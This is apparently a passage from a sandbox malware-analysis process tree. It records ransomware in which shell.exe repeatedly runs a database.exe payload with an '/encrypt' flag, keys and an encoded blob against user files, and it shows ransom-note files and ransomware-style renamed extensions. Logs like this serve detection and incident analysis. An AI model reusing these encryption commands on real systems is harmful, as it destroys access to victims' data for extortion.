                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\WaitRequest.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\WatchComplete.ico.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Saved Games\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Saved Games\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Searches\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4324
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Searches\Everywhere.search-ms.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Documents\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Documents\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Downloads\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Downloads\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Sample Music\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Sample Music\[email protected] 1.2.0.0.id-PWMKXUEAKWFERZZJIPDAFYRRCQTEJNYWNZUY-11@7@2024 4@47@48 PM5858394.randomname-XVHTSZBDMOSTVKUWYZBGKMNPSTVXZB.OSE.cbf.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Sample Music\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Music\Sample Music\Sleep Away.mp3.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5160
